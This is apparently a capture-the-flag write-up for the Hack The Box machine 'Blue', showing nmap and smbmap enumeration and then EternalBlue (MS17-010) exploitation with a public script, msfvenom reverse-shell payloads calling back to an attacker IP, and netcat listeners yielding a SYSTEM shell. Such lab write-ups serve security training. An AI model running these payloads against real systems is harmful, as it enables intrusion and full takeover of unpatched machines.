HTB - Blue
About the Box:
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
IP: 10.10.10.40
Arch: x64-based PC
Difficulty: EasyGetting Root:
Discovered smb ports are opened
Check for smb vulnerabilities and discovered it was vulnerable to MS17-010
Used a python exploit from github
Get a shell with system privileges
Nmap
Quick scan
# nmap 10.10.10.40
Host is up (0.045s latency).
Not shown: 991 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Enumerating versions and execute default scripts
# Command
nmap -Pn -sC -sV -p 135,139,445,49152,49153,49154,49155,49156,49157 -oN Blue_nmap.txt 10.10.10.40
# Results
Nmap scan report for 10.10.10.40
Host is up (0.046s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 53s, deviation: 0s, median: 52s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-01-20T17:22:24+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-01-20T17:22:26
|_ start_date: 2020-01-19T23:53:17
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 20 12:21:39 2020 -- 1 IP address (1 host up) scanned in 69.89 seconds
Nmap - smb vuln script
Nmap shows the target is vulnerable to MS-17-010
root@kdeali:~/HackTheBox/Blue# nmap --script vuln -p 139,445 10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-07 17:17 EST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.40
Host is up (0.045s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 51.69 seconds
smbmap
Checking smp shares without username, we get nothing
root@kdeali:~/HackTheBox/Blue# smbmap -H 10.10.10.40
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.40...
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
Disk Permissions Comment
---- ----------- -------
[!] Access Denied
Checking smb shares specifying a username (I used "nobody12") and we got something
root@kdeali:~/HackTheBox/Blue# smbmap -H 10.10.10.40 -u "nobody12"
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.40...
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
.
dr--r--r-- 0 Fri Jul 21 02:44:22 2017 .
dr--r--r-- 0 Fri Jul 21 02:44:22 2017 ..
Share READ ONLY
.
dw--w--w-- 0 Fri Jul 21 02:56:23 2017 .
dw--w--w-- 0 Fri Jul 21 02:56:23 2017 ..
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Default
fr--r--r-- 174 Fri Jul 14 18:32:23 2017 desktop.ini
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Public
Users READ ONLY
The same results can be obtained by using -u " " (I prefer to specify a user)
root@kdeali:~/HackTheBox/Blue# smbmap -H 10.10.10.40 -u " "
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.40...
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
.
dr--r--r-- 0 Fri Jul 21 02:44:22 2017 .
dr--r--r-- 0 Fri Jul 21 02:44:22 2017 ..
Share READ ONLY
.
dw--w--w-- 0 Fri Jul 21 02:56:23 2017 .
dw--w--w-- 0 Fri Jul 21 02:56:23 2017 ..
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Default
fr--r--r-- 174 Fri Jul 14 18:32:23 2017 desktop.ini
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Public
Users READ ONLY
Checking the files recursively with -R to check for interesting files we read.
root@kdeali:~/HackTheBox/Blue# smbmap -H 10.10.10.40 -u "nobody12" -R
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.40...
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
.
dr--r--r-- 0 Fri Jul 21 02:44:22 2017 .
dr--r--r-- 0 Fri Jul 21 02:44:22 2017 ..
Share READ ONLY
.\
.
dw--w--w-- 0 Fri Jul 21 02:56:23 2017 .
dw--w--w-- 0 Fri Jul 21 02:56:23 2017 ..
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Default
fr--r--r-- 174 Fri Jul 14 18:32:23 2017 desktop.ini
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Public
Users READ ONLY
.\
dw--w--w-- 0 Fri Jul 21 02:56:23 2017 .
dw--w--w-- 0 Fri Jul 21 02:56:23 2017 ..
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Default
-r--r--r-- 174 Fri Jul 14 18:32:23 2017 desktop.ini
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Public
.\Default\
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 .
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 ..
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 AppData
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Desktop
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Documents
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Downloads
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Favorites
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Links
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Music
-r--r--r-- 262144 Sun Jul 16 16:22:24 2017 NTUSER.DAT
-r--r--r-- 1024 Fri Jul 14 18:32:24 2017 NTUSER.DAT.LOG
-r--r--r-- 189440 Sun Jul 16 16:22:24 2017 NTUSER.DAT.LOG1
-r--r--r-- 0 Fri Jul 14 18:37:45 2017 NTUSER.DAT.LOG2
-r--r--r-- 65536 Fri Jul 14 18:32:24 2017 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
-r--r--r-- 524288 Fri Jul 14 18:32:24 2017 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
-r--r--r-- 524288 Fri Jul 14 18:32:23 2017 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Pictures
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Saved Games
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Videos
.\Default\AppData\
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 .
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 ..
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Local
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Roaming
.\Default\AppData\Local\
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 .
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 ..
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Microsoft
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Temp
.\Default\AppData\Local\Microsoft\
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 .
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 ..
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Windows
.\Default\AppData\Local\Microsoft\Windows\
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 .
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 ..
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 GameExplorer
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 History
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Temporary Internet Files
.\Default\AppData\Roaming\
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 .
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 ..
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Media Center Programs
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Microsoft
.\Default\AppData\Roaming\Microsoft\
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 .
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 ..
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Internet Explorer
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Windows
.\Default\AppData\Roaming\Microsoft\Internet Explorer\
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 .
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 ..
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Quick Launch
.\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 .
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 ..
-r--r--r-- 146 Fri Jul 14 18:32:24 2017 desktop.ini
-r--r--r-- 290 Fri Jul 14 18:32:24 2017 Shows Desktop.lnk
-r--r--r-- 272 Fri Jul 14 18:32:24 2017 Window Switcher.lnk
.\Default\AppData\Roaming\Microsoft\Windows\
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 .
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 ..
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Cookies
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Network Shortcuts
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Printer Shortcuts
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Recent
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 SendTo
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Start Menu
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Templates
.\Default\AppData\Roaming\Microsoft\Windows\SendTo\
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 .
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 ..
-r--r--r-- 3 Fri Jul 14 18:32:24 2017 Compressed (zipped) Folder.ZFSendToTarget
-r--r--r-- 7 Fri Jul 14 18:32:24 2017 Desktop (create shortcut).DeskLink
-r--r--r-- 558 Fri Jul 14 18:32:24 2017 Desktop.ini
-r--r--r-- 1238 Fri Jul 14 18:32:24 2017 Fax Recipient.lnk
-r--r--r-- 4 Fri Jul 14 18:32:24 2017 Mail Recipient.MAPIMail
.\Default\AppData\Roaming\Microsoft\Windows\Start Menu\
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 .
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 ..
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 Programs
.\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 .
dr--r--r-- 0 Fri Jul 14 18:37:45 2017 ..
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Accessories
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Maintenance
.\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 .
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 ..
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 Accessibility
-r--r--r-- 1280 Fri Jul 14 18:32:24 2017 Command Prompt.lnk
-r--r--r-- 678 Fri Jul 14 18:32:24 2017 Desktop.ini
-r--r--r-- 1304 Fri Jul 14 18:32:24 2017 Notepad.lnk
-r--r--r-- 262 Fri Jul 14 18:32:24 2017 Run.lnk
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 System Tools
-r--r--r-- 1228 Fri Jul 14 18:32:24 2017 Windows Explorer.lnk
.\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 .
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 ..
-r--r--r-- 704 Fri Jul 14 18:32:24 2017 Desktop.ini
-r--r--r-- 1358 Fri Jul 14 18:32:24 2017 Ease of Access.lnk
-r--r--r-- 1258 Fri Jul 14 18:32:24 2017 Magnify.lnk
-r--r--r-- 1262 Fri Jul 14 18:32:24 2017 Narrator.lnk
-r--r--r-- 1250 Fri Jul 14 18:32:24 2017 On-Screen Keyboard.lnk
.\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 .
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 ..
-r--r--r-- 262 Fri Jul 14 18:32:24 2017 computer.lnk
-r--r--r-- 262 Fri Jul 14 18:32:24 2017 Control Panel.lnk
-r--r--r-- 592 Fri Jul 14 18:32:24 2017 Desktop.ini
-r--r--r-- 1306 Fri Jul 14 18:32:24 2017 Private Character Editor.lnk
.\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 .
dw--w--w-- 0 Fri Jul 14 18:37:45 2017 ..
-r--r--r-- 318 Fri Jul 14 18:32:24 2017 Desktop.ini
-r--r--r-- 262 Fri Jul 14 18:32:24 2017 Help.lnk
.\Public\
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 ..
-r--r--r-- 174 Fri Jul 21 02:40:38 2017 desktop.ini
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Documents
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Downloads
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Favorites
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Libraries
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Music
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Pictures
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Recorded TV
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Videos
.\Public\Documents\
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 ..
-r--r--r-- 278 Fri Jul 21 02:40:38 2017 desktop.ini
.\Public\Downloads\
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 ..
-r--r--r-- 174 Fri Jul 21 02:40:38 2017 desktop.ini
.\Public\Libraries\
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 ..
-r--r--r-- 88 Fri Jul 21 02:40:38 2017 desktop.ini
-r--r--r-- 876 Fri Jul 21 02:40:38 2017 RecordedTV.library-ms
.\Public\Music\
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 ..
-r--r--r-- 380 Fri Jul 21 02:40:38 2017 desktop.ini
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Sample Music
.\Public\Music\Sample Music\
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 ..
-r--r--r-- 586 Fri Jul 21 02:40:38 2017 desktop.ini
-r--r--r-- 8414449 Fri Jul 21 02:40:38 2017 Kalimba.mp3
-r--r--r-- 4113874 Fri Jul 21 02:40:38 2017 Maid with the Flaxen Hair.mp3
-r--r--r-- 4842585 Fri Jul 21 02:40:38 2017 Sleep Away.mp3
.\Public\Pictures\
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 ..
-r--r--r-- 380 Fri Jul 21 02:40:38 2017 desktop.ini
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Sample Pictures
.\Public\Pictures\Sample Pictures\
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 ..
-r--r--r-- 879394 Fri Jul 21 02:40:38 2017 Chrysanthemum.jpg
-r--r--r-- 845941 Fri Jul 21 02:40:38 2017 Desert.jpg
-r--r--r-- 1120 Fri Jul 21 02:40:38 2017 desktop.ini
-r--r--r-- 595284 Fri Jul 21 02:40:38 2017 Hydrangeas.jpg
-r--r--r-- 775702 Fri Jul 21 02:40:38 2017 Jellyfish.jpg
-r--r--r-- 780831 Fri Jul 21 02:40:38 2017 Koala.jpg
-r--r--r-- 561276 Fri Jul 21 02:40:38 2017 Lighthouse.jpg
-r--r--r-- 777835 Fri Jul 21 02:40:38 2017 Penguins.jpg
-r--r--r-- 620888 Fri Jul 21 02:40:38 2017 Tulips.jpg
.\Public\Recorded TV\
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 ..
-r--r--r-- 80 Fri Jul 21 02:40:38 2017 desktop.ini
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Sample Media
.\Public\Recorded TV\Sample Media\
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 ..
-r--r--r-- 171 Fri Jul 21 02:40:38 2017 desktop.ini
-r--r--r-- 9699328 Fri Jul 21 02:40:38 2017 win7_scenic-demoshort_raw.wtv
.\Public\Videos\
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 ..
-r--r--r-- 380 Fri Jul 21 02:40:38 2017 desktop.ini
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 Sample Videos
.\Public\Videos\Sample Videos\
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 .
dw--w--w-- 0 Fri Jul 21 02:40:38 2017 ..
-r--r--r-- 326 Fri Jul 21 02:40:38 2017 desktop.ini
-r--r--r-- 26246026 Fri Jul 21 02:40:38 2017 Wildlife.wmv
Exploiting - MS17-010 Manually
Github: https://github.com/3ndG4me/AutoBlue-MS17-010
Run the shell_prep.sh script and it will generate the payloads for x86 and x64
root@kdeali:/opt/AutoBlue-MS17-010/shellcode# ./shell_prep.sh
_.-;;-._
'-..-'| || |
'-..-'|_.-;;-._|
'-..-'| || |
'-..-'|_.-''-._|
Eternal Blue Windows Shellcode Compiler
Let's compile them windoos shellcodezzz
Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
Y
LHOST for reverse connection:
10.10.14.19
LPORT you want x64 to listen on:
8123
LPORT you want x86 to listen on:
8124
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.19 LPORT=8123
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin
Generating x86 cmd shell (stageless)...
msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.19 LPORT=8124
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin
MERGING SHELLCODE WOOOO!!!
DONE
root@kdeali:/opt/AutoBlue-MS17-010/shellcode#
# These are the files generated
root@kdeali:/opt/AutoBlue-MS17-010/shellcode# ls -l
total 80
-rw-r--r-- 1 root root 20305 Jan 8 14:39 eternalblue_kshellcode_x64.asm
-rw-r--r-- 1 root root 19862 Jan 8 14:39 eternalblue_kshellcode_x86.asm
-rw-r--r-- 1 root root 1589 Jan 8 14:39 eternalblue_sc_merge.py
-rw-r--r-- 1 root root 2203 Feb 7 17:27 sc_all.bin
-rw-r--r-- 1 root root 1232 Feb 7 17:27 sc_x64.bin
-rw-r--r-- 1 root root 772 Feb 7 17:26 sc_x64_kernel.bin
-rw-r--r-- 1 root root 460 Feb 7 17:27 sc_x64_msf.bin
-rw-r--r-- 1 root root 962 Feb 7 17:27 sc_x86.bin
-rw-r--r-- 1 root root 638 Feb 7 17:26 sc_x86_kernel.bin
-rw-r--r-- 1 root root 324 Feb 7 17:27 sc_x86_msf.bin
-rwxr-xr-x 1 root root 4556 Jan 8 14:39 shell_prep.sh
# The sc_all.bin is the file you need!!!
Start the listener
# Port to get shell if x86
nc -lnvp 8123
and
# Port to get shell if x64
nc -lnvp 8124Execute the exploit
# Run it wihtout arguments to see the usage:
root@kdeali:/opt/AutoBlue-MS17-010# python eternalblue_exploit7.py
eternalblue_exploit7.py <ip> <shellcode_file> [numGroomConn]
# Execute the exploit
root@kdeali:/opt/AutoBlue-MS17-010# python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
We got a shell with system privileges
root@kdeali:~/HackTheBox/Blue# nc -lnvp 8123
listening on [any] 8123 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::d9ea:9b4b:ca07:c644
Temporary IPv6 Address. . . . . . : dead:beef::c1a3:4567:bd9d:edd4
Link-local IPv6 Address . . . . . : fe80::d9ea:9b4b:ca07:c644%11
IPv4 Address. . . . . . . . . . . : 10.10.10.40
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:3982%11
10.10.10.2
Tunnel adapter isatap.{CBC67B8A-5031-412C-AEA7-B3186D30360E}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter Teredo Tunneling Pseudo-Interface:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Windows\system32>
Last updated
